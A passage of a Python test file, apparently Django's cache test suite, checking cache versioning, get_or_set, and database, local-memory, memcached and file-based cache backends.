self.assertEqual(cache.get('answer2', version=2), 42)
self.assertEqual(caches['v2'].get('answer2'), 42)
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertEqual(caches['v2'].get('answer2', version=2), 42)
# v2 set, using default version = 2
caches['v2'].set('answer3', 42)
self.assertIsNone(cache.get('answer3'))
self.assertIsNone(cache.get('answer3', version=1))
self.assertEqual(cache.get('answer3', version=2), 42)
self.assertEqual(caches['v2'].get('answer3'), 42)
self.assertIsNone(caches['v2'].get('answer3', version=1))
self.assertEqual(caches['v2'].get('answer3', version=2), 42)
# v2 set, default version = 2, but manually override version = 1
caches['v2'].set('answer4', 42, version=1)
self.assertEqual(cache.get('answer4'), 42)
self.assertEqual(cache.get('answer4', version=1), 42)
self.assertIsNone(cache.get('answer4', version=2))
self.assertIsNone(caches['v2'].get('answer4'))
self.assertEqual(caches['v2'].get('answer4', version=1), 42)
self.assertIsNone(caches['v2'].get('answer4', version=2))
def test_cache_versioning_add(self):
# add, default version = 1, but manually override version = 2
cache.add('answer1', 42, version=2)
self.assertIsNone(cache.get('answer1', version=1))
self.assertEqual(cache.get('answer1', version=2), 42)
cache.add('answer1', 37, version=2)
self.assertIsNone(cache.get('answer1', version=1))
self.assertEqual(cache.get('answer1', version=2), 42)
cache.add('answer1', 37, version=1)
self.assertEqual(cache.get('answer1', version=1), 37)
self.assertEqual(cache.get('answer1', version=2), 42)
# v2 add, using default version = 2
caches['v2'].add('answer2', 42)
self.assertIsNone(cache.get('answer2', version=1))
self.assertEqual(cache.get('answer2', version=2), 42)
caches['v2'].add('answer2', 37)
self.assertIsNone(cache.get('answer2', version=1))
self.assertEqual(cache.get('answer2', version=2), 42)
caches['v2'].add('answer2', 37, version=1)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertEqual(cache.get('answer2', version=2), 42)
# v2 add, default version = 2, but manually override version = 1
caches['v2'].add('answer3', 42, version=1)
self.assertEqual(cache.get('answer3', version=1), 42)
self.assertIsNone(cache.get('answer3', version=2))
caches['v2'].add('answer3', 37, version=1)
self.assertEqual(cache.get('answer3', version=1), 42)
self.assertIsNone(cache.get('answer3', version=2))
caches['v2'].add('answer3', 37)
self.assertEqual(cache.get('answer3', version=1), 42)
self.assertEqual(cache.get('answer3', version=2), 37)
def test_cache_versioning_has_key(self):
cache.set('answer1', 42)
# has_key
self.assertTrue(cache.has_key('answer1'))
self.assertTrue(cache.has_key('answer1', version=1))
self.assertFalse(cache.has_key('answer1', version=2))
self.assertFalse(caches['v2'].has_key('answer1'))
self.assertTrue(caches['v2'].has_key('answer1', version=1))
self.assertFalse(caches['v2'].has_key('answer1', version=2))
def test_cache_versioning_delete(self):
cache.set('answer1', 37, version=1)
cache.set('answer1', 42, version=2)
cache.delete('answer1')
self.assertIsNone(cache.get('answer1', version=1))
self.assertEqual(cache.get('answer1', version=2), 42)
cache.set('answer2', 37, version=1)
cache.set('answer2', 42, version=2)
cache.delete('answer2', version=2)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertIsNone(cache.get('answer2', version=2))
cache.set('answer3', 37, version=1)
cache.set('answer3', 42, version=2)
caches['v2'].delete('answer3')
self.assertEqual(cache.get('answer3', version=1), 37)
self.assertIsNone(cache.get('answer3', version=2))
cache.set('answer4', 37, version=1)
cache.set('answer4', 42, version=2)
caches['v2'].delete('answer4', version=1)
self.assertIsNone(cache.get('answer4', version=1))
self.assertEqual(cache.get('answer4', version=2), 42)
def test_cache_versioning_incr_decr(self):
cache.set('answer1', 37, version=1)
cache.set('answer1', 42, version=2)
cache.incr('answer1')
self.assertEqual(cache.get('answer1', version=1), 38)
self.assertEqual(cache.get('answer1', version=2), 42)
cache.decr('answer1')
self.assertEqual(cache.get('answer1', version=1), 37)
self.assertEqual(cache.get('answer1', version=2), 42)
cache.set('answer2', 37, version=1)
cache.set('answer2', 42, version=2)
cache.incr('answer2', version=2)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertEqual(cache.get('answer2', version=2), 43)
cache.decr('answer2', version=2)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertEqual(cache.get('answer2', version=2), 42)
cache.set('answer3', 37, version=1)
cache.set('answer3', 42, version=2)
caches['v2'].incr('answer3')
self.assertEqual(cache.get('answer3', version=1), 37)
self.assertEqual(cache.get('answer3', version=2), 43)
caches['v2'].decr('answer3')
self.assertEqual(cache.get('answer3', version=1), 37)
self.assertEqual(cache.get('answer3', version=2), 42)
cache.set('answer4', 37, version=1)
cache.set('answer4', 42, version=2)
caches['v2'].incr('answer4', version=1)
self.assertEqual(cache.get('answer4', version=1), 38)
self.assertEqual(cache.get('answer4', version=2), 42)
caches['v2'].decr('answer4', version=1)
self.assertEqual(cache.get('answer4', version=1), 37)
self.assertEqual(cache.get('answer4', version=2), 42)
def test_cache_versioning_get_set_many(self):
# set, using default version = 1
cache.set_many({'ford1': 37, 'arthur1': 42})
self.assertEqual(cache.get_many(['ford1', 'arthur1']), {'ford1': 37, 'arthur1': 42})
self.assertEqual(cache.get_many(['ford1', 'arthur1'], version=1), {'ford1': 37, 'arthur1': 42})
self.assertEqual(cache.get_many(['ford1', 'arthur1'], version=2), {})
self.assertEqual(caches['v2'].get_many(['ford1', 'arthur1']), {})
self.assertEqual(caches['v2'].get_many(['ford1', 'arthur1'], version=1), {'ford1': 37, 'arthur1': 42})
self.assertEqual(caches['v2'].get_many(['ford1', 'arthur1'], version=2), {})
# set, default version = 1, but manually override version = 2
cache.set_many({'ford2': 37, 'arthur2': 42}, version=2)
self.assertEqual(cache.get_many(['ford2', 'arthur2']), {})
self.assertEqual(cache.get_many(['ford2', 'arthur2'], version=1), {})
self.assertEqual(cache.get_many(['ford2', 'arthur2'], version=2), {'ford2': 37, 'arthur2': 42})
self.assertEqual(caches['v2'].get_many(['ford2', 'arthur2']), {'ford2': 37, 'arthur2': 42})
self.assertEqual(caches['v2'].get_many(['ford2', 'arthur2'], version=1), {})
self.assertEqual(caches['v2'].get_many(['ford2', 'arthur2'], version=2), {'ford2': 37, 'arthur2': 42})
# v2 set, using default version = 2
caches['v2'].set_many({'ford3': 37, 'arthur3': 42})
self.assertEqual(cache.get_many(['ford3', 'arthur3']), {})
self.assertEqual(cache.get_many(['ford3', 'arthur3'], version=1), {})
self.assertEqual(cache.get_many(['ford3', 'arthur3'], version=2), {'ford3': 37, 'arthur3': 42})
self.assertEqual(caches['v2'].get_many(['ford3', 'arthur3']), {'ford3': 37, 'arthur3': 42})
self.assertEqual(caches['v2'].get_many(['ford3', 'arthur3'], version=1), {})
self.assertEqual(caches['v2'].get_many(['ford3', 'arthur3'], version=2), {'ford3': 37, 'arthur3': 42})
# v2 set, default version = 2, but manually override version = 1
caches['v2'].set_many({'ford4': 37, 'arthur4': 42}, version=1)
self.assertEqual(cache.get_many(['ford4', 'arthur4']), {'ford4': 37, 'arthur4': 42})
self.assertEqual(cache.get_many(['ford4', 'arthur4'], version=1), {'ford4': 37, 'arthur4': 42})
self.assertEqual(cache.get_many(['ford4', 'arthur4'], version=2), {})
self.assertEqual(caches['v2'].get_many(['ford4', 'arthur4']), {})
self.assertEqual(caches['v2'].get_many(['ford4', 'arthur4'], version=1), {'ford4': 37, 'arthur4': 42})
self.assertEqual(caches['v2'].get_many(['ford4', 'arthur4'], version=2), {})
def test_incr_version(self):
cache.set('answer', 42, version=2)
self.assertIsNone(cache.get('answer'))
self.assertIsNone(cache.get('answer', version=1))
self.assertEqual(cache.get('answer', version=2), 42)
self.assertIsNone(cache.get('answer', version=3))
self.assertEqual(cache.incr_version('answer', version=2), 3)
self.assertIsNone(cache.get('answer'))
self.assertIsNone(cache.get('answer', version=1))
self.assertIsNone(cache.get('answer', version=2))
self.assertEqual(cache.get('answer', version=3), 42)
caches['v2'].set('answer2', 42)
self.assertEqual(caches['v2'].get('answer2'), 42)
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertEqual(caches['v2'].get('answer2', version=2), 42)
self.assertIsNone(caches['v2'].get('answer2', version=3))
self.assertEqual(caches['v2'].incr_version('answer2'), 3)
self.assertIsNone(caches['v2'].get('answer2'))
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertIsNone(caches['v2'].get('answer2', version=2))
self.assertEqual(caches['v2'].get('answer2', version=3), 42)
with self.assertRaises(ValueError):
cache.incr_version('does_not_exist')
def test_decr_version(self):
cache.set('answer', 42, version=2)
self.assertIsNone(cache.get('answer'))
self.assertIsNone(cache.get('answer', version=1))
self.assertEqual(cache.get('answer', version=2), 42)
self.assertEqual(cache.decr_version('answer', version=2), 1)
self.assertEqual(cache.get('answer'), 42)
self.assertEqual(cache.get('answer', version=1), 42)
self.assertIsNone(cache.get('answer', version=2))
caches['v2'].set('answer2', 42)
self.assertEqual(caches['v2'].get('answer2'), 42)
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertEqual(caches['v2'].get('answer2', version=2), 42)
self.assertEqual(caches['v2'].decr_version('answer2'), 1)
self.assertIsNone(caches['v2'].get('answer2'))
self.assertEqual(caches['v2'].get('answer2', version=1), 42)
self.assertIsNone(caches['v2'].get('answer2', version=2))
with self.assertRaises(ValueError):
cache.decr_version('does_not_exist', version=2)
def test_custom_key_func(self):
# Two caches with different key functions aren't visible to each other
cache.set('answer1', 42)
self.assertEqual(cache.get('answer1'), 42)
self.assertIsNone(caches['custom_key'].get('answer1'))
self.assertIsNone(caches['custom_key2'].get('answer1'))
caches['custom_key'].set('answer2', 42)
self.assertIsNone(cache.get('answer2'))
self.assertEqual(caches['custom_key'].get('answer2'), 42)
self.assertEqual(caches['custom_key2'].get('answer2'), 42)
def test_cache_write_unpicklable_object(self):
update_middleware = UpdateCacheMiddleware()
update_middleware.cache = cache
fetch_middleware = FetchFromCacheMiddleware()
fetch_middleware.cache = cache
request = self.factory.get('/cache/test')
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNone(get_cache_data)
response = HttpResponse()
content = 'Testing cookie serialization.'
response.content = content
response.set_cookie('foo', 'bar')
update_middleware.process_response(request, response)
get_cache_data = fetch_middleware.process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, content.encode())
self.assertEqual(get_cache_data.cookies, response.cookies)
update_middleware.process_response(request, get_cache_data)
get_cache_data = fetch_middleware.process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, content.encode())
self.assertEqual(get_cache_data.cookies, response.cookies)
def test_add_fail_on_pickleerror(self):
# Shouldn't fail silently if trying to cache an unpicklable type.
with self.assertRaises(pickle.PickleError):
cache.add('unpicklable', Unpicklable())
def test_set_fail_on_pickleerror(self):
with self.assertRaises(pickle.PickleError):
cache.set('unpicklable', Unpicklable())
def test_get_or_set(self):
self.assertIsNone(cache.get('projector'))
self.assertEqual(cache.get_or_set('projector', 42), 42)
self.assertEqual(cache.get('projector'), 42)
self.assertEqual(cache.get_or_set('null', None), None)
self.assertIsNone(cache.get_or_set('null', 'default'))
def test_get_or_set_callable(self):
def my_callable():
return 'value'
self.assertEqual(cache.get_or_set('mykey', my_callable), 'value')
self.assertEqual(cache.get_or_set('mykey', my_callable()), 'value')
def test_get_or_set_callable_returning_none(self):
self.assertIsNone(cache.get_or_set('mykey', lambda: None))
# Previous get_or_set() doesn't store None in the cache.
self.assertIsNone(cache.get_or_set('mykey', 'default'))
self.assertIsNone(cache.get('mykey', 'default'))
def test_get_or_set_version(self):
msg = "get_or_set() missing 1 required positional argument: 'default'"
cache.get_or_set('brian', 1979, version=2)
with self.assertRaisesMessage(TypeError, msg):
cache.get_or_set('brian')
with self.assertRaisesMessage(TypeError, msg):
cache.get_or_set('brian', version=1)
self.assertIsNone(cache.get('brian', version=1))
self.assertEqual(cache.get_or_set('brian', 42, version=1), 42)
self.assertEqual(cache.get_or_set('brian', 1979, version=2), 1979)
self.assertIsNone(cache.get('brian', version=3))
def test_get_or_set_racing(self):
with mock.patch('%s.%s' % (settings.CACHES['default']['BACKEND'], 'add')) as cache_add:
# Simulate cache.add() failing to add a value. In that case, the
# default value should be returned.
cache_add.return_value = False
self.assertEqual(cache.get_or_set('key', 'default'), 'default')
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.db.DatabaseCache',
# Spaces are used in the table name to ensure quoting/escaping is working
LOCATION='test cache table'
))
class DBCacheTests(BaseCacheTests, TransactionTestCase):
available_apps = ['cache']
def setUp(self):
# The super calls needs to happen first for the settings override.
super().setUp()
self.create_table()
def tearDown(self):
# The super call needs to happen first because it uses the database.
super().tearDown()
self.drop_table()
def create_table(self):
management.call_command('createcachetable', verbosity=0)
def drop_table(self):
with connection.cursor() as cursor:
table_name = connection.ops.quote_name('test cache table')
cursor.execute('DROP TABLE %s' % table_name)
def test_get_many_num_queries(self):
cache.set_many({'a': 1, 'b': 2})
cache.set('expired', 'expired', 0.01)
with self.assertNumQueries(1):
self.assertEqual(cache.get_many(['a', 'b']), {'a': 1, 'b': 2})
time.sleep(0.02)
with self.assertNumQueries(2):
self.assertEqual(cache.get_many(['a', 'b', 'expired']), {'a': 1, 'b': 2})
def test_delete_many_num_queries(self):
cache.set_many({'a': 1, 'b': 2, 'c': 3})
with self.assertNumQueries(1):
cache.delete_many(['a', 'b', 'c'])
def test_zero_cull(self):
self._perform_cull_test(caches['zero_cull'], 50, 18)
def test_second_call_doesnt_crash(self):
out = io.StringIO()
management.call_command('createcachetable', stdout=out)
self.assertEqual(out.getvalue(), "Cache table 'test cache table' already exists.\n" * len(settings.CACHES))
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.db.DatabaseCache',
# Use another table name to avoid the 'table already exists' message.
LOCATION='createcachetable_dry_run_mode'
))
def test_createcachetable_dry_run_mode(self):
out = io.StringIO()
management.call_command('createcachetable', dry_run=True, stdout=out)
output = out.getvalue()
self.assertTrue(output.startswith("CREATE TABLE"))
def test_createcachetable_with_table_argument(self):
"""
Delete and recreate cache table with legacy behavior (explicitly
specifying the table name).
"""
self.drop_table()
out = io.StringIO()
management.call_command(
'createcachetable',
'test cache table',
verbosity=2,
stdout=out,
)
self.assertEqual(out.getvalue(), "Cache table 'test cache table' created.\n")
@override_settings(USE_TZ=True)
class DBCacheWithTimeZoneTests(DBCacheTests):
pass
class DBCacheRouter:
"""A router that puts the cache table on the 'other' database."""
def db_for_read(self, model, **hints):
if model._meta.app_label == 'django_cache':
return 'other'
return None
def db_for_write(self, model, **hints):
if model._meta.app_label == 'django_cache':
return 'other'
return None
def allow_migrate(self, db, app_label, **hints):
if app_label == 'django_cache':
return db == 'other'
return None
@override_settings(
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.db.DatabaseCache',
'LOCATION': 'my_cache_table',
},
},
)
class CreateCacheTableForDBCacheTests(TestCase):
databases = {'default', 'other'}
@override_settings(DATABASE_ROUTERS=[DBCacheRouter()])
def test_createcachetable_observes_database_router(self):
# cache table should not be created on 'default'
with self.assertNumQueries(0, using='default'):
management.call_command('createcachetable', database='default', verbosity=0)
# cache table should be created on 'other'
# Queries:
# 1: check table doesn't already exist
# 2: create savepoint (if transactional DDL is supported)
# 3: create the table
# 4: create the index
# 5: release savepoint (if transactional DDL is supported)
num = 5 if connections['other'].features.can_rollback_ddl else 3
with self.assertNumQueries(num, using='other'):
management.call_command('createcachetable', database='other', verbosity=0)
class PicklingSideEffect:
def __init__(self, cache):
self.cache = cache
self.locked = False
def __getstate__(self):
self.locked = self.cache._lock.locked()
return {}
limit_locmem_entries = override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.locmem.LocMemCache',
OPTIONS={'MAX_ENTRIES': 9},
))
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.locmem.LocMemCache',
))
class LocMemCacheTests(BaseCacheTests, TestCase):
def setUp(self):
super().setUp()
# LocMem requires a hack to make the other caches
# share a data store with the 'normal' cache.
caches['prefix']._cache = cache._cache
caches['prefix']._expire_info = cache._expire_info
caches['v2']._cache = cache._cache
caches['v2']._expire_info = cache._expire_info
caches['custom_key']._cache = cache._cache
caches['custom_key']._expire_info = cache._expire_info
caches['custom_key2']._cache = cache._cache
caches['custom_key2']._expire_info = cache._expire_info
@override_settings(CACHES={
'default': {'BACKEND': 'django.core.cache.backends.locmem.LocMemCache'},
'other': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'other'
},
})
def test_multiple_caches(self):
"Multiple locmem caches are isolated"
cache.set('value', 42)
self.assertEqual(caches['default'].get('value'), 42)
self.assertIsNone(caches['other'].get('value'))
def test_locking_on_pickle(self):
"""#20613/#18541 -- Ensures pickling is done outside of the lock."""
bad_obj = PicklingSideEffect(cache)
cache.set('set', bad_obj)
self.assertFalse(bad_obj.locked, "Cache was locked during pickling")
cache.add('add', bad_obj)
self.assertFalse(bad_obj.locked, "Cache was locked during pickling")
def test_incr_decr_timeout(self):
"""incr/decr does not modify expiry time (matches memcached behavior)"""
key = 'value'
_key = cache.make_key(key)
cache.set(key, 1, timeout=cache.default_timeout * 10)
expire = cache._expire_info[_key]
cache.incr(key)
self.assertEqual(expire, cache._expire_info[_key])
cache.decr(key)
self.assertEqual(expire, cache._expire_info[_key])
@limit_locmem_entries
def test_lru_get(self):
"""get() moves cache keys."""
for key in range(9):
cache.set(key, key, timeout=None)
for key in range(6):
self.assertEqual(cache.get(key), key)
cache.set(9, 9, timeout=None)
for key in range(6):
self.assertEqual(cache.get(key), key)
for key in range(6, 9):
self.assertIsNone(cache.get(key))
self.assertEqual(cache.get(9), 9)
@limit_locmem_entries
def test_lru_set(self):
"""set() moves cache keys."""
for key in range(9):
cache.set(key, key, timeout=None)
for key in range(3, 9):
cache.set(key, key, timeout=None)
cache.set(9, 9, timeout=None)
for key in range(3, 10):
self.assertEqual(cache.get(key), key)
for key in range(3):
self.assertIsNone(cache.get(key))
@limit_locmem_entries
def test_lru_incr(self):
"""incr() moves cache keys."""
for key in range(9):
cache.set(key, key, timeout=None)
for key in range(6):
cache.incr(key)
cache.set(9, 9, timeout=None)
for key in range(6):
self.assertEqual(cache.get(key), key + 1)
for key in range(6, 9):
self.assertIsNone(cache.get(key))
self.assertEqual(cache.get(9), 9)
# memcached backend isn't guaranteed to be available.
# To check the memcached backend, the test settings file will
# need to contain at least one cache backend setting that points at
# your memcache server.
configured_caches = {}
for _cache_params in settings.CACHES.values():
configured_caches[_cache_params['BACKEND']] = _cache_params
MemcachedCache_params = configured_caches.get('django.core.cache.backends.memcached.MemcachedCache')
PyLibMCCache_params = configured_caches.get('django.core.cache.backends.memcached.PyLibMCCache')
# The memcached backends don't support cull-related options like `MAX_ENTRIES`.
memcached_excluded_caches = {'cull', 'zero_cull'}
class BaseMemcachedTests(BaseCacheTests):
# By default it's assumed that the client doesn't clean up connections
# properly, in which case the backend must do so after each request.
should_disconnect_on_close = True
def test_location_multiple_servers(self):
locations = [
['server1.tld', 'server2:11211'],
'server1.tld;server2:11211',
'server1.tld,server2:11211',
]
for location in locations:
with self.subTest(location=location):
params = {'BACKEND': self.base_params['BACKEND'], 'LOCATION': location}
with self.settings(CACHES={'default': params}):
self.assertEqual(cache._servers, ['server1.tld', 'server2:11211'])
def test_invalid_key_characters(self):
"""
On memcached, we don't introduce a duplicate key validation
step (for speed reasons), we just let the memcached API
library raise its own exception on bad keys. Refs #6447.
In order to be memcached-API-library agnostic, we only assert
that a generic exception of some kind is raised.
"""
# memcached does not allow whitespace or control characters in keys
# when using the ascii protocol.
with self.assertRaises(Exception):
cache.set('key with spaces', 'value')
def test_invalid_key_length(self):
# memcached limits key length to 250
with self.assertRaises(Exception):
cache.set('a' * 251, 'value')
def test_default_never_expiring_timeout(self):
# Regression test for #22845
with self.settings(CACHES=caches_setting_for_tests(
base=self.base_params,
exclude=memcached_excluded_caches,
TIMEOUT=None)):
cache.set('infinite_foo', 'bar')
self.assertEqual(cache.get('infinite_foo'), 'bar')
def test_default_far_future_timeout(self):
# Regression test for #22845
with self.settings(CACHES=caches_setting_for_tests(
base=self.base_params,
exclude=memcached_excluded_caches,
# 60*60*24*365, 1 year
TIMEOUT=31536000)):
cache.set('future_foo', 'bar')
self.assertEqual(cache.get('future_foo'), 'bar')
def test_cull(self):
# culling isn't implemented, memcached deals with it.
pass
def test_zero_cull(self):
# culling isn't implemented, memcached deals with it.
pass
def test_memcached_deletes_key_on_failed_set(self):
# By default memcached allows objects up to 1MB. For the cache_db session
# backend to always use the current session, memcached needs to delete
# the old key if it fails to set.
# pylibmc doesn't seem to have SERVER_MAX_VALUE_LENGTH as far as I can
# tell from a quick check of its source code. This is falling back to
# the default value exposed by python-memcached on my system.
max_value_length = getattr(cache._lib, 'SERVER_MAX_VALUE_LENGTH', 1048576)
cache.set('small_value', 'a')
self.assertEqual(cache.get('small_value'), 'a')
large_value = 'a' * (max_value_length + 1)
try:
cache.set('small_value', large_value)
except Exception:
# Some clients (e.g. pylibmc) raise when the value is too large,
# while others (e.g. python-memcached) intentionally return True
# indicating success. This test is primarily checking that the key
# was deleted, so the return/exception behavior for the set()
# itself is not important.
pass
# small_value should be deleted, or set if configured to accept larger values
value = cache.get('small_value')
self.assertTrue(value is None or value == large_value)
def test_close(self):
# For clients that don't manage their connections properly, the
# connection is closed when the request is complete.
signals.request_finished.disconnect(close_old_connections)
try:
with mock.patch.object(cache._lib.Client, 'disconnect_all', autospec=True) as mock_disconnect:
signals.request_finished.send(self.__class__)
self.assertIs(mock_disconnect.called, self.should_disconnect_on_close)
finally:
signals.request_finished.connect(close_old_connections)
def test_set_many_returns_failing_keys(self):
def fail_set_multi(mapping, *args, **kwargs):
return mapping.keys()
with mock.patch('%s.Client.set_multi' % self.client_library_name, side_effect=fail_set_multi):
failing_keys = cache.set_many({'key': 'value'})
self.assertEqual(failing_keys, ['key'])
@unittest.skipUnless(MemcachedCache_params, "MemcachedCache backend not configured")
@override_settings(CACHES=caches_setting_for_tests(
base=MemcachedCache_params,
exclude=memcached_excluded_caches,
))
class MemcachedCacheTests(BaseMemcachedTests, TestCase):
base_params = MemcachedCache_params
client_library_name = 'memcache'
def test_memcached_uses_highest_pickle_version(self):
# Regression test for #19810
for cache_key in settings.CACHES:
with self.subTest(cache_key=cache_key):
self.assertEqual(caches[cache_key]._cache.pickleProtocol, pickle.HIGHEST_PROTOCOL)
@override_settings(CACHES=caches_setting_for_tests(
base=MemcachedCache_params,
exclude=memcached_excluded_caches,
OPTIONS={'server_max_value_length': 9999},
))
def test_memcached_options(self):
self.assertEqual(cache._cache.server_max_value_length, 9999)
def test_default_used_when_none_is_set(self):
"""
python-memcached doesn't support default in get() so this test
overrides the one in BaseCacheTests.
"""
cache.set('key_default_none', None)
self.assertEqual(cache.get('key_default_none', default='default'), 'default')
@unittest.skipUnless(PyLibMCCache_params, "PyLibMCCache backend not configured")
@override_settings(CACHES=caches_setting_for_tests(
base=PyLibMCCache_params,
exclude=memcached_excluded_caches,
))
class PyLibMCCacheTests(BaseMemcachedTests, TestCase):
base_params = PyLibMCCache_params
client_library_name = 'pylibmc'
# libmemcached manages its own connections.
should_disconnect_on_close = False
# By default, pylibmc/libmemcached don't verify keys client-side and so
# this test triggers a server-side bug that causes later tests to fail
# (#19914). The `verify_keys` behavior option could be set to True (which
# would avoid triggering the server-side bug), however this test would
# still fail due to https://github.com/lericson/pylibmc/issues/219.
@unittest.skip("triggers a memcached-server bug, causing subsequent tests to fail")
def test_invalid_key_characters(self):
pass
@override_settings(CACHES=caches_setting_for_tests(
base=PyLibMCCache_params,
exclude=memcached_excluded_caches,
OPTIONS={
'binary': True,
'behaviors': {'tcp_nodelay': True},
},
))
def test_pylibmc_options(self):
self.assertTrue(cache._cache.binary)
self.assertEqual(cache._cache.behaviors['tcp_nodelay'], int(True))
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.filebased.FileBasedCache',
))
class FileBasedCacheTests(BaseCacheTests, TestCase):
"""
Specific test cases for the file-based cache.
"""
def setUp(self):
super().setUp()
self.dirname = tempfile.mkdtemp()
# Caches location cannot be modified through override_settings / modify_settings,
# hence settings are manipulated directly here and the setting_changed signal
# is triggered manually.
for cache_params in settings.CACHES.values():
cache_params.update({'LOCATION': self.dirname})
setting_changed.send(self.__class__, setting='CACHES', enter=False)
def tearDown(self):
super().tearDown()
# Call parent first, as cache.clear() may recreate cache base directory
shutil.rmtree(self.dirname)
def test_ignores_non_cache_files(self):
fname = os.path.join(self.dirname, 'not-a-cache-file')
with open(fname, 'w'):
os.utime(fname, None)
cache.clear()
self.assertTrue(os.path.exists(fname),
'Expected cache.clear to ignore non cache files')
os.remove(fname)
def test_clear_does_not_remove_cache_dir(self):
cache.clear()
self.assertTrue(os.path.exists(self.dirname),
'Expected cache.clear to keep the cache dir')
def test_creates_cache_dir_if_nonexistent(self):
os.rmdir(self.dirname)
cache.set('foo', 'bar')
self.assertTrue(os.path.exists(self.dirname))
def test_get_ignores_enoent(self):
cache.set('foo', 'bar')
os.unlink(cache._key_to_file('foo'))
# Returns the default instead of erroring.
self.assertEqual(cache.get('foo', 'baz'), 'baz')
def test_get_does_not_ignore_non_filenotfound_exceptions(self):
with mock.patch('builtins.open', side_effect=OSError):
with self.assertRaises(OSError):
cache.get('foo')
def test_empty_cache_file_considered_expired(self):
cache_file = cache._key_to_file('foo')
with open(cache_file, 'wb') as fh:
fh.write(b'')
with open(cache_file, 'rb') as fh:
self.assertIs(cache._is_expired(fh), True)
@override_settings(CACHES={
'default': {
'BACKEND': 'cache.liberal_backend.CacheClass',
},
})
class CustomCacheKeyValidationTests(SimpleTestCase):
"""
Tests for the ability to mixin a custom ``validate_key`` method to
a custom cache backend that otherwise inherits from a builtin
backend, and override the default key validation. Refs #6447.
"""
def test_custom_key_validation(self):
# this key is both longer than 250 characters, and has spaces
key = 'some key with spaces' * 15
val = 'a value'
cache.set(key, val)
self.assertEqual(cache.get(key), val)
@override_settings(
CACHES={
'default': {
'BACKEND': 'cache.closeable_cache.CacheClass',
}
}
)
class CacheClosingTests(SimpleTestCase):
def test_close(self):
self.assertFalse(cache.closed)
signals.request_finished.send(self.__class__)
self.assertTrue(cache.closed)
DEFAULT_MEMORY_CACHES_SETTINGS = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'unique-snowflake',
}
}
NEVER_EXPIRING_CACHES_SETTINGS = copy.deepcopy(DEFAULT_MEMORY_CACHES_SETTINGS)
NEVER_EXPIRING_CACHES_SETTINGS['default']['TIMEOUT'] = None
class DefaultNonExpiringCacheKeyTests(SimpleTestCase):
"""
Settings having Cache arguments with a TIMEOUT=None create Caches that will
set non-expiring keys.
"""
def setUp(self):
# The 5 minute (300 seconds) default expiration time for keys is
# defined in the implementation of the initializer method of the
# BaseCache type.
self.DEFAULT_TIMEOUT = caches[DEFAULT_CACHE_ALIAS].default_timeout
def tearDown(self):
del(self.DEFAULT_TIMEOUT)
def test_default_expiration_time_for_keys_is_5_minutes(self):
"""The default expiration time of a cache key is 5 minutes.
This value is defined in
django.core.cache.backends.base.BaseCache.__init__().
"""
self.assertEqual(300, self.DEFAULT_TIMEOUT)
def test_caches_with_unset_timeout_has_correct_default_timeout(self):
"""Caches that have the TIMEOUT parameter undefined in the default
settings will use the default 5 minute timeout.
"""
cache = caches[DEFAULT_CACHE_ALIAS]
self.assertEqual(self.DEFAULT_TIMEOUT, cache.default_timeout)
@override_settings(CACHES=NEVER_EXPIRING_CACHES_SETTINGS)
def test_caches_set_with_timeout_as_none_has_correct_default_timeout(self):
"""Memory caches that have the TIMEOUT parameter set to `None` in the
default settings with have `None` as the default timeout.
This means "no timeout".
"""
cache = caches[DEFAULT_CACHE_ALIAS]
self.assertIsNone(cache.default_timeout)
self.assertIsNone(cache.get_backend_timeout())
@override_settings(CACHES=DEFAULT_MEMORY_CACHES_SETTINGS)
def test_caches_with_unset_timeout_set_expiring_key(self):
"""Memory caches that have the TIMEOUT parameter unset will set cache
keys having the default 5 minute timeout.
"""
key = "my-key"
value = "my-value"
cache = caches[DEFAULT_CACHE_ALIAS]
cache.set(key, value)
cache_key = cache.make_key(key)
self.assertIsNotNone(cache._expire_info[cache_key])
@override_settings(CACHES=NEVER_EXPIRING_CACHES_SETTINGS)
def test_caches_set_with_timeout_as_none_set_non_expiring_key(self):
"""Memory caches that have the TIMEOUT parameter set to `None` will set
a non expiring key by default.
"""
key = "another-key"
value = "another-value"
cache = caches[DEFAULT_CACHE_ALIAS]
cache.set(key, value)
cache_key = cache.make_key(key)
self.assertIsNone(cache._expire_info[cache_key])
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix',
CACHE_MIDDLEWARE_SECONDS=1,
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
USE_I18N=False,
ALLOWED_HOSTS=['.example.com'],
)
class CacheUtils(SimpleTestCase):
"""TestCase for django.utils.cache functions."""
host = 'www.example.com'
path = '/cache/test/'
factory = RequestFactory(HTTP_HOST=host)
def tearDown(self):
cache.clear()
def _get_request_cache(self, method='GET', query_string=None, update_cache=None):
request = self._get_request(self.host, self.path,
method, query_string=query_string)
request._cache_update_cache = True if not update_cache else update_cache
return request
def _set_cache(self, request, msg):
response = HttpResponse()
response.content = msg
return UpdateCacheMiddleware().process_response(request, response)
def test_patch_vary_headers(self):
headers = (
# Initial vary, new headers, resulting vary.
(None, ('Accept-Encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('accept-encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('ACCEPT-ENCODING',), 'Accept-Encoding'),
('Cookie', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
